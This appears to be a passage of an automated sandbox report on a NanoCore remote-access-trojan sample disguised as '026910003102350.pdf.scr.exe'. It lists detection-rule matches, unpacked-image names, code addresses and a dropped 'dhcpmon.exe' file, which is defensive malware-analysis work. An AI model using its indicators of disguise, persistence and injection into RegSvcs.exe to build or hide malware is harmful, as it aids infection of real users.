      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC848E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD6CDC
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC40FE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD4088
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD00B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE51C9
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD7153
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD62CA
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC32F7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD43BF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CED440
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCF461
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCC426
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD77EF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CED8EE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC286B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CF19F4
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCE9B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD3E0B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCEFE2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE4F9A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00338037
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00332007
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032E0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0031E1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0031225D
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034A28E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003322C2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032C59E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034E89F
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038291A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00346AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00378B27
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0033CE30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00347169
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A51D2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00319240
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00319499
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00331724
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00331A96
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00319B60
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00337BAB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00331D40
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00337DDA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
